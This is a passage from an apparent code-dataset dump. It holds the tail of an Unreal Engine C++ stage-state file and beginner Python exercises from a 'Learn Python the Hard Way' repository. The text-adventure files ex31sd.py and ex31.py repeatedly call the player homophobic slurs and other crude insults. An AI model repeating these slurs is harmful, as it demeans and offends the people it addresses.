\"Player/PlayerController/PG_PlayerController.h\"\n\n#include <EngineUtils.h>\n\nAPG_GameStateStage::APG_GameStateStage()\n{\n\n}\n\nvoid APG_GameStateStage::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_GameStateStage::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tif (false == InitStageData())\n\t{\n\t\tABLOG(Error, TEXT(\"Init Stage Data Failed!!\"));\n\t}\n\n\tauto pPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pPlayerState);\n\tpPlayerState->OnKillAddRewardPoint.AddUObject(this, 
&APG_GameStateStage::OnKillAddRewardPoint);\n\n\t// 스테이지 타이머 가동\n\tGetWorldTimerManager().SetTimer(StageTimerHandle, this, &APG_GameStateStage::OnStageTimerTick, 1.0f, true, 1.0f);\n}\n\nbool APG_GameStateStage::InitStageData()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\t// Get Stage Data\n\tint32 PlayStageID = pGameModeBase->GetPlayStageID();\n\tStageData = pGameInstance->GetTableStageData(PlayStageID);\n\tABCHECK(nullptr != StageData, false);\n\n\t// Set Kill Z\n\tGetWorldSettings()->KillZ = -500.0f;\n\n\t// 레벨에 설치된 몬스터 수 저장\n\tStagePlayData.NumberOfMonsters = GetLevelInstallMonsterCount();\n\tStagePlayData.NumberOfMonstersMuiltiKill = StageData->Multi_Kill;\n\tStagePlayData.RemainTime = StageData->Time;\n\tStagePlayData.PlayTime = 0;\n\n\tABLOG(Warning, TEXT(\"[ Stage Information ] ----------------------------------------\"));\n\tABLOG(Warning, TEXT(\"Stage ID : %d\"), PlayStageID);\n\tABLOG(Warning, TEXT(\"Stage Name : %s\"), *StageData->StageName);\n\tABLOG(Warning, TEXT(\"M_Amount : %d\"), StageData->M_Amount);\n\tABLOG(Warning, TEXT(\"Time : %d\"), StageData->Time);\n\tABLOG(Warning, TEXT(\"Multi_Kill : %d\"), StageData->Multi_Kill);\n\tABLOG(Warning, TEXT(\"StageClearReward : %d\"), StageData->StageClearReward);\n\tABLOG(Warning, TEXT(\"StarReward : %d\"), StageData->StarReward);\n\tABLOG(Warning, TEXT(\"Number Of Monsters : %d\"), StagePlayData.NumberOfMonsters);\n\tABLOG(Warning, TEXT(\"-------------------------------------------------------------\"));\n\n\treturn CheckStageData();\n}\n\nvoid APG_GameStateStage::MonsterDie(APG_MonChar* KillMon, bool IsLethalAttack)\n{\n\tauto pDivisionMonster = Cast<APG_MonCharDivision>(KillMon);\n\tif (pDivisionMonster && pDivisionMonster->IsDivisionChild())\n\t{\n\t\t// 분화형 몬스터의 자식이 죽었을 때는 몬스터 킬수 카운트에 포함하지 않는다. 
(본체만 카운트 적용)\n\t\treturn;\n\t}\n\n\tABCHECK(nullptr != KillMon);\n\tStagePlayData.NumberOfMonstersKilled += 1;\n\n\tauto pMyPlayerController = Cast<APG_PlayerController>(GetWorld()->GetFirstPlayerController());\n\tABCHECK(nullptr != pMyPlayerController);\n\n\tauto pMyPlayerState = pMyPlayerController->GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (IsLethalAttack)\n\t\tpMyPlayerState->MonsterLethalAttackKill(KillMon);\t\t// 필살기로 죽인 몬스터\n\telse\n\t\tpMyPlayerState->MonsterKill(KillMon);\t\t\t\t\t// 일반 공격으로 죽인 몬스터\n\n\tUdpateWidgetPlayStage.Broadcast();\n\n\t// 스테이지 클리어 조건을 만족하면 다음 스테이지 이동 게이트를 오픈한다.\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tif (pGameModeStage->IsStageClear())\n\t\tGateOpenDelegate.Broadcast();\n}\n\nint32 APG_GameStateStage::GetLevelInstallMonsterCount()\n{\n\tint32 nMonsterCount = 0;\n\tfor (TActorIterator<APG_MonChar> It(GetWorld()); It; ++It)\n\t\tnMonsterCount++;\n\n\treturn nMonsterCount;\n}\n\nint32 APG_GameStateStage::GetRemainStageTimer()\n{\n\treturn StagePlayData.RemainTime;\n}\n\nint32 APG_GameStateStage::GetMaxLethalKill()\n{\n\treturn StagePlayData.NumberOfMonstersMuiltiKilled;\n}\n\n\nint32 APG_GameStateStage::GetClearTotalPoint()\n{\n\tint nTotalReward = 0;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, 0);\n\n\t// 스테이지 클리어 포인트\n\tnTotalReward += GetClearStagePoint();\n\n\t// 스테이지 미션 포인트\n\tnTotalReward += GetClearMissionPoint();\n\n\t// 몬스터 처치 포인트\n\tnTotalReward += GetClearMonsterKillPoint();\n\n\t// 광고 보상 포인트\n\tif (pGameStateStage->IsViewAD())\n\t\tnTotalReward = nTotalReward * PG_ADVIEW_REWARD;\n\n\treturn nTotalReward;\n}\n\nint32 APG_GameStateStage::GetClearStagePoint()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, 0);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeBase->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData, 0);\n\n\treturn pTableStageData->StageClearReward;\n}\n\nint32 APG_GameStateStage::GetClearMissionPoint()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, 0);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData, 0);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\n\tint32 nClearPoint = 0;\n\tnClearPoint += (bIsClearAmount && !bIsWasClearAmount) ? pTableStageData->StarReward : 0;\n\tnClearPoint += (bIsClearLethal && !bIsWasClearLethal) ? pTableStageData->StarReward : 0;\n\tnClearPoint += (bIsClearTime && !bIsWasClearTime) ? 
pTableStageData->StarReward : 0;\n\n\treturn nClearPoint;\n}\nint32 APG_GameStateStage::GetClearMonsterKillPoint()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, 0);\n\n\treturn pGameStateStage->GetStagePlayData()->KillRewardPoint;\n}\n\nvoid APG_GameStateStage::SetMaxLethalKill(int32 a_nMaxLethalKill)\n{\n\tif (a_nMaxLethalKill <= StagePlayData.NumberOfMonstersMuiltiKilled)\n\t\treturn;\n\n\tStagePlayData.NumberOfMonstersMuiltiKilled = a_nMaxLethalKill;\n\n\tUdpateWidgetPlayStage.Broadcast();\n}\n\nbool APG_GameStateStage::IsViewAD()\n{\n\treturn m_bViewAD;\n}\n\nvoid APG_GameStateStage::SetViewAD(bool bEnable)\n{\n\tm_bViewAD = bEnable;\n}\n\nbool APG_GameStateStage::RequestViewAD()\n{\n\tif (m_bViewAD)\n\t\treturn false;\n\n\tauto pMyPlayerController = Cast<APG_PlayerController>(GetWorld()->GetFirstPlayerController());\n\tABCHECK(nullptr != pMyPlayerController, false);\n\n\tauto pPlayerState = Cast<APG_MyPlayerState>(pMyPlayerController->PlayerState);\n\tABCHECK(nullptr != pPlayerState, false);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, false);\n\n\tSetViewAD(true);\n\n\t// 광고 보상 적용\n\tint32 nRewardPoint = pPlayerState->GetOriginalPlayerData()->RewardPoint;\n\tpPlayerState->SetRewardPoint(nRewardPoint + GetClearTotalPoint());\n\n\t// 플레이어 데이터 저장\n\tpGameModeStage->SetSavePlayerData(*pPlayerState->GetPlayingPlayerData());\n\n\tOnViewAD.Broadcast(m_bViewAD);\n\n\treturn m_bViewAD;\n}\n\nvoid APG_GameStateStage::OnCheckStageClear()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tif (pGameModeStage->IsStageClear())\n\t{\n\t\tGetWorldTimerManager().ClearTimer(StageTimerHandle);\n\t\tABLOG(Warning, TEXT(\"Stage Clear Succees!\"));\n\t\tStageClearDelegate.Broadcast();\n\t}\n\telse\n\t{\n\t\tABLOG(Warning, TEXT(\"Stage Clear Failed!\"));\n\t}\n}\n\nvoid APG_GameStateStage::OnCheckStageFailed()\n{\n\tGetWorldTimerManager().ClearTimer(StageTimerHandle);\n\n\tStageFailedDelegate.Broadcast();\n}\n\nvoid APG_GameStateStage::OnKillAddRewardPoint(int32 a_nAddRewardPoint)\n{\n\tStagePlayData.KillRewardPoint += a_nAddRewardPoint;\n}\n\nvoid APG_GameStateStage::OnStageTimerTick()\n{\n\tStagePlayData.PlayTime += 1;\n\n\tif (0 < StagePlayData.RemainTime)\n\t{\n\t\t--StagePlayData.RemainTime;\n\t\tStageTimerDelegate.Broadcast();\n\t\tUdpateWidgetPlayStage.Broadcast();\n\t}\n}\n\nbool APG_GameStateStage::CheckStageData()\n{\n\tABCHECK(StageData, false);\n\n\tif (StagePlayData.NumberOfMonsters < StageData->M_Amount)\n\t{\n\t\t// 설치된 몬스터가 스테이지 테이블의 \"M_Amount\"값보다 작습니다. (스테이지 클리어를 할 수 없는 조건)\n\t\tABLOG(Error, TEXT(\"The installed monster is less than the \"\"M_Amount\"\" value in the stage table.\"), false);\n\t}\n\n\treturn true;\n}" } ]
133
surakhchin/Learn-Python-the-Hard-Way
https://github.com/surakhchin/Learn-Python-the-Hard-Way
312a1ac3ef71d64bb367888622639264272885aa
88abc56d6fa6e5352ac7bc88933066fe81af83a1
bf09b75da4a99c84623ee62cc25445f0e1fc2995
refs/heads/master
2021-01-10T03:08:53.354176
2016-04-01T02:01:17
2016-04-01T02:01:17
53,166,964
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5273010730743408, "alphanum_fraction": 0.5335413217544556, "avg_line_length": 18.9375, "blob_id": "6b2ef63c2ac0935240c2e4c7073a4debb003f7a7", "content_id": "ff625dfe0848ac3d6c70aedaa4d45c114ccbf9d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "no_license", "max_line_length": 38, "num_lines": 32, "path": "/ex40.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Song(object):\n\n def __init__(self, lyrics):\n self.lyrics = lyrics\n\n def sing_me_a_song(self,):\n for line in self.lyrics:\n print line\n\nprint (\"-\" *20)\n\n\nbridge = ([\"Sometimes I feel like\",\n \"I don't have a partner\",\n \"Sometimes I feel like\",\n \"My only friend\",\n \"Is the city I live in\",\n \"The city of Angles!\"])\n\neminem = ([\"I'm slim shady\",\n \"Yes I'm the real shady\",\n \"Will the real slim shday\",\n \"Please stand up?\"])\n\nany_song = Song(bridge)\n\n\nany_song.sing_me_a_song()\n\nany_song1 = Song(eminem)\n\nany_song1.sing_me_a_song()\n\n\n\n" }, { "alpha_fraction": 0.6841294169425964, "alphanum_fraction": 0.6841294169425964, "avg_line_length": 37.235294342041016, "blob_id": "d90a65fedd0fcebe595176c7895a00d94d36b90e", "content_id": "4c0be0b08b0d4794fe53154de1afd5b39f1ad6a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 149, "num_lines": 17, "path": "/ex11.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"How old are you?\",\nage = raw_input()\nprint \"How tall are you?\", #note: we put a , at the end of each print line so it doesnt end the line with a newline character and go to the next line\nheight = raw_input()\nprint \"How much do you weight\",\nweight = raw_input()\n\nprint \"So, you're %s old, %s tall and %s heavy.\" % (age, height, weight)\n\nname = raw_input(\"What is your name? 
\")\nprint \"Hello, %r\" % name\n\nnationality = raw_input(\"What country where you born?\")\nschool = raw_input(\"What college did you graduate?\")\njob = raw_input(\"What job do you possess\")\n\nprint \"%s was born in %s went to %s and works as %s\" % (name, nationality, school, job)" }, { "alpha_fraction": 0.4982078969478607, "alphanum_fraction": 0.5089605450630188, "avg_line_length": 15.411765098571777, "blob_id": "3f5583db3f6df272060846da4f44c8bcf883b30d", "content_id": "e1f967dc3831260940d388d9dd1aa72e3a2e84ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/ex33.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "number = []\n\ndef wyle(a,i):\n i\n while i < a:\n print \"At the top i is %d\" % i\n number.append(i)\n\n i = i + 1\n print \"Numbers now: \", number\n print \"At the bottom i is %d\" % i\nwyle(6,5)\n\nprint \"The numbers\"\n\nfor num in number:\n print num\n" }, { "alpha_fraction": 0.5304509401321411, "alphanum_fraction": 0.5462575554847717, "avg_line_length": 43.83333206176758, "blob_id": "0aa07e3c1f1c873ca9e82c2acbf69f75d4d9cfca", "content_id": "e9edc3be53b6ec75afaf72f798c486eaf0952e46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2151, "license_type": "no_license", "max_line_length": 123, "num_lines": 48, "path": "/ex31sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You have 3 doors in front of you.... door #1, #2, and #3... choose wisely or you shall face the wrath of this code:\"\n\ndef doors():\n door = raw_input(\"> \")\n if door == \"1\":\n print \"You walk in the room with a sleeping bear. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Piss your pants and perform a Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Sry m8 the door is locked. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Piss your pants and perform a Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"You turn around and stumble into the bear, waking him up, he gets pissed and eats you.\"\n print \"GAME OVER BRO\"\n elif door1 == \"2\":\n print \"You wake up the bear, who is pissed, and he eats you.\"\n print \"GAME OVER BRO\"\n elif door1 == \"3\":\n print \"You pull out your blade, but then realize oh snap I have a blade. Do you:\"\n print \"1. Still kill yourself cause you are a faggot.\"\n print \"2. Perform a flying downward sword thrust of doom.\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Good job you played yo self\"\n print \"GAME OVER BRO\"\n elif door1 == \"2\":\n print \"Congratulations! You defeated the bear and completed level 6. You are not a Faggot.\"\n else:\n print \"You are Fag and can't follow directions. Bear wakes up and eats you.\"\n print \"GAME OVER BRO\"\n else:\n print \"You are fag and can't follow directions. Bear wakes up and eats you.\"\n print \"GAME OVER BRO\"\n elif door == \"2\":\n print \"Door 2 is locked. Try another door.\"\n doors()\n elif door == \"3\":\n print \"Door 3 is locked. 
Try another door.\"\n doors()\n else:\n print \"Uhh you did nothing, try again.\"\n doors()\ndoors()" }, { "alpha_fraction": 0.5843558311462402, "alphanum_fraction": 0.5843558311462402, "avg_line_length": 22.962963104248047, "blob_id": "5c3f598ba2a2c3532fabcb418944c2905c654933", "content_id": "2c3212aafbf66bd2081d5474d774e0ee89c6d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 81, "num_lines": 27, "path": "/ex40-2.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Song(object):\n\n def __init__(self, lyrics): #this line stores instance variable in self\n self.lyrics = lyrics\n\n def sing_me_a_song(self): # this line takes the instance variable and uses it\n for line in self.lyrics:\n print line\n\nbridge = ([\"Sometimes I feel like\",\n \"I don't have a partner\",\n \"Sometimes I feel like\",\n \"My only friend\",\n \"Is the city I live in\",\n \"The city of Angles!\"])\n\nunder_the_bridge = Song(bridge)\n\n\nyoyo = ([\"Uhh this is a test\",\n \"To see if I am dumb.\"])\n\nunder_the_bridge.sing_me_a_song()\n\nxoxo = Song(yoyo)\n\nxoxo.sing_me_a_song()\n\n\n\n\n\n" }, { "alpha_fraction": 0.49196141958236694, "alphanum_fraction": 0.6237941980361938, "avg_line_length": 23, "blob_id": "856626e6572731bfab5c566ea0f58bc4cbb4fe27", "content_id": "52c8a33a354689655e0a089e23d7d80f63fa5a32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 70, "num_lines": 13, "path": "/ex19sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def one_in_10_function(a,b,c):\n\tprint \"%r, %r, %r\" % (a,b,c)\n\none_in_10_function(1,2,3)\none_in_10_function(int(raw_input()),int(raw_input()),int(raw_input()))\none_in_10_function(15+16,30+30,50+23)\nA = 33\nB = 55\nC = 11\n\none_in_10_function(A,B,C)\none_in_10_function(\"a\",\"b\",\"c\")\none_in_10_function(A+10,B+10,C+10)" }, { "alpha_fraction": 0.4354838728904724, "alphanum_fraction": 0.4677419364452362, "avg_line_length": 10.181818008422852, "blob_id": "4b67de71c01d0a0ef3957d935683bd644e7506e2", "content_id": "14d27a79bbed69d4fa9ed7b3198f05e82689af4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 18, "num_lines": 11, "path": "/ex111.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def x(y):\n\ty.append(3)\n\treturn y\n\nz = list()\n#z = []\n#y = undefined\nprint x(z)\n#z = [] or z = [3]\n#z =[], z2 = [3]\nprint z\n\n" }, { "alpha_fraction": 0.5291308760643005, "alphanum_fraction": 0.5453677177429199, "avg_line_length": 41.75510025024414, "blob_id": "26ec81daa472f90317dcaf76efe0acebd1c1bf5b", "content_id": "b4705dfa051bb027e17e0632cc5c0a8e8886e872", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 115, "num_lines": 49, "path": "/ex31fun.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You have 3 doors in front of you.. door #1, #2, #3, choose wisely or you shall face the wrath of this code:\"\n\ndef doors():\n\n door = raw_input(\"> \")\n if door == \"1\":\n print \"you walk in the room with a sleeping bear. Do you:\"\n print \"1. 
Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Wet your pants and prepare for Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Sry m8 the door is locked. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Wet your pants and prepare for Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"You turn around and stumble into the bear, waking him up, he gets mad and eats you.\"\n print \"Game over!\"\n elif door1 == \"2\":\n print \"you wake up the bear, who is mad, and he eats you.\"\n print \"Game over!\"\n elif door1 == \"3\":\n print \"you pull out your blade, but then realize oh snap I have a blade. Do you:\"\n print \"1. Still kill yourself because you don't wanna get eaten.\"\n print \"2. Perform a flying downward sword thrust of doom.\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Good try, but Game over!\"\n elif door1 == \"2\":\n print \"Congratulations! You defeated the bear and completed level 6.\"\n else:\n print \"You didnt pick a valid option, so the bear wakes up and eats you.\"\n print \"Game over!\"\n else:\n print \"You did not follow the directions, the bear wakes up and eats you.\"\n print \"Game over!\"\n elif door == \"2\":\n print \"Door 2 is locked. Try another door.\"\n doors()\n elif door == \"3\":\n print \"Door 3 is locked. Try another door.\"\n doors()\n else:\n print \"Uhh you did not pick a door option, please try again.\"\n doors()\n\ndoors()" }, { "alpha_fraction": 0.6171003580093384, "alphanum_fraction": 0.6394051909446716, "avg_line_length": 19.69230842590332, "blob_id": "c41adcbdf55b50f43552e25bc2725c9b96b7378f", "content_id": "02f5624a2537103d836af63cd88c60704ef6d947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/ex39.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"\\n\\n\\n\\n\"\nprint \"This is a simple example of a list:\"\nthings = ['a', 'b','c','d']\nprint things[1]\nthings[1] = 'z'\nprint things\nprint \"\\n\"\nprint \"Now lets look at dicts:\"\nstuff = {'name': 'Zed', 'age': 39, 'height': 6*12 +2}\nprint stuff['name']\nprint stuff['age']\nprint stuff['height']\nstuff['city'] = \"San Francisco\"\nprint stuff['city']\nprint stuff\nprint \"\\n\\n\\n\"\nstuff[1] = 'wow'\nstuff[2] = 'Neato'\nprint stuff\nprint '\\n\\n\\n'\nprint \"no delete stuff use del:\"\ndel stuff['city']\ndel stuff[1]\ndel stuff[2]\nprint stuff\nprint \"\\n\\n\\n\"\n" }, { "alpha_fraction": 0.5893617272377014, "alphanum_fraction": 0.6048632264137268, "avg_line_length": 32.581634521484375, "blob_id": "791fdaa855a13a38ae52472668c626e871bfd263", "content_id": "d55f5b70b4041b10c2d9dda2d24f0f00e4442e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3290, "license_type": "no_license", "max_line_length": 81, "num_lines": 98, "path": "/ClassCarObjectEx2.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Car(object):\n \"\"\" A car for sale by Serge U Dealership.\n\n Attributes:\n wheels: An integer representing the number of wheels the car has.\n miles: The integral number of miles driven on the car.\n make: The make of the car as a string.\n model: The model of the car as a string.\n year: The integral year the car was 
built.\n sold_on: The date the vehicle was sold.\n \"\"\"\n\n def __init__(self, wheels, miles, make, model, year, sold_on):\n \"\"\"\n :param wheels: An integer representing the number of wheels the car has.\n :param miles: The integral number of miles driven on the car.\n :param make: The make of the car as a string.\n :param model: The model of the car as a string.\n :param year: The integral year the car was built.\n :param sold_on: The date the vehicle was sold.\n :return: A new Car object\n \"\"\"\n self.wheels = wheels\n self.miles = miles\n self.make = make\n self.model = model\n self.year = year\n self.sold_on = sold_on\n\n def sale_price(self):\n \"\"\"\n :return: Return the sale price for this car as a float amount.\n \"\"\"\n if self.sold_on is not None:\n return 0.0 # Already sold\n return 5000.0 * self.wheels\n\n def purchase_price(self):\n \"\"\"\n :return: Return the price for which we would pay to purchase the vehicle.\n \"\"\"\n if self.sold_on is None:\n return 0.0 # Not yet sold\n return 8000 - (.10 * self.miles)\n\nclass Truck(object):\n \"\"\"A truck for sale by Serge U. Dealership.\n\n Attributes:\n wheels: An integer representing the number of wheels the car has.\n miles: The integral number of miles driven on the truck.\n make: The make of the truck as a string.\n model: The model of the truck as a string.\n year: The integral year the truck was built.\n sold_on: The date the vehicle was sold.\n \"\"\"\n def __init__(self, wheels, miles, make, model, year, sold_on):\n \"\"\"\n :param wheels: An integer representing the number of wheels the car has.\n :param miles: The integral number of miles driven on the truck.\n :param make: The make of the truck as a string.\n :param model: The model of the truck as a string.\n :param year: The integral year the truck was built.\n :param sold_on: The date the vehicle was sold.\n :return: Return a new Truck object.\n \"\"\"\n self.wheels = wheels\n self.miles = miles\n self.make = make\n self.model = model\n self.year = year\n self.sold_on = sold_on\n\n def sale_price(self):\n \"\"\"\n :return: Return the sale price for this truck as a float amount.\n \"\"\"\n if self.sold_on is not None:\n return 0.0 # Already sold\n return 5000.0 * self.wheels\n\n def purchase_price(self):\n \"\"\"\n :return: Return the price for which we would pay to purchase\n \"\"\"\n if self.sold_on is None:\n return 0.0 # Not yet sold\n return 10000 - (.10 * self.miles)\n\ncarA = Car(4,40000, \"nissan\", \"leaf\", 2016, None)\nprint carA.year\nprint carA.make\nprint carA\n\ncarB = Truck(4, 70000, \"Ford\", \"Escort\", 2001, None)\n\nprint carB.model\nprint carB.miles" }, { "alpha_fraction": 0.6154276132583618, "alphanum_fraction": 0.6260480880737305, "avg_line_length": 39.65909194946289, "blob_id": "25471a64dd39b71e6b693e3a50938f6e2325f01f", "content_id": "6d6afedb2f701260ede04383457f479b46e85594", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1789, "license_type": "no_license", "max_line_length": 142, "num_lines": 44, "path": "/ex31.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You enter a dark room with two doors. Do you go through door #1 or door #2?\"\n\ndoor = raw_input(\"> \")\n\nif door == \"1\":\n print \"There's a giant bear here eating a cheese cake! What do you do?!\"\n print \"1. Take the cake.\"\n print \"2. Scream at the bear.\"\n print \"3. 
Pretend you are dead.\"\n\n bear = raw_input(\"> \")\n\n if bear == \"1\":\n print \"The bear eats your face off. Good job!\"\n elif bear == \"2\":\n print \"The bear proceeds to eat your legs off. Good job faggot!\"\n elif bear == \"3\":\n print \"He saw you fall to the ground and begins to eat you...\"\n print \"Do you want to: \\n1. Accept your fate and die like a man.\\n2. Punch the bear in the nostrils.\"\n fate = raw_input(\"> \")\n if fate == \"1\":\n print \"The bear thinks you are either a pussy and feels bad for you or you are dead, so he walks away in disgust\"\n elif fate == \"2\":\n print \"The bear gets really pissed and bites off your hand, then spits it out and shoves it in your ass. You die of constipation.\"\n else:\n print \"You hesitated and pissed your pants, and the bear wants nothing to deal with a pants pisser.\"\n else:\n print \"Well, doing %s is probably better. Bear runs away.\" % bear\n\nelif door == \"2\":\n print \"You stare into the endless abyss at Cthulu's retina.\"\n print \"1. Blueberries.\"\n print \"2. Yellow jacket clothespins.\"\n print \"3. Understanding revolvers yelling melodies.\"\n\n insanity = raw_input(\"> \")\n\n if insanity == \"1\" or insanity == \"2\":\n print \"Your body survives powered by a mind of jello. Good job!\"\n else:\n print \"The insanity rots your eyes into a pool of much. Good job!\"\n\nelse:\n print \"You stumble around and fall on a knife and die. Good job!\"\n" }, { "alpha_fraction": 0.37837839126586914, "alphanum_fraction": 0.5135135054588318, "avg_line_length": 5.333333492279053, "blob_id": "39fa5f87681b7cea43053029c433a404a70858d1", "content_id": "5df1b3a687a12d64af6101200a7456cb7698f170", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 13, "num_lines": 6, "path": "/ex36.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "x = 5\n\nx == 10\n\nprint x\nprint x == 10" }, { "alpha_fraction": 0.6763485670089722, "alphanum_fraction": 0.6929460763931274, "avg_line_length": 17.576923370361328, "blob_id": "c38b6d2d229ca2bd3b69e532281b5fd23cfeda33", "content_id": "6a85b2e38b84be9eaa8fa9d5e13edabb1b81fb5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/oop_test1.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "from urllib import urlopen\n\n\nWORD_URL = \"http://learncodethehardway.org/words.txt\"\nWORDS = []\n\n\n# load up the words from the website\nfor word in urlopen(WORD_URL).readlines():\n WORDS.append(word.strip())\n\n\nprint \"*\" * 134\nprint urlopen(WORD_URL).readlines()\n\nprint \"*\" * 134\nprint WORDS\n\nfruits = ['banana', 'apple', 'mango']\nfor index in range(len(fruits)):\n print 'Current fruit :', fruits[index]\n\nprint len(fruits)\nprint range(80)\nprint range(len(fruits))\nprint \"Good bye!\"" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 8, "blob_id": "6a1004fc73489dfc88b289558cee3908904439e2", "content_id": "3eb3fcd72a045084ddbe517ea7ad1ed4c233ded2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 13, "num_lines": 5, "path": "/ex21sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": 
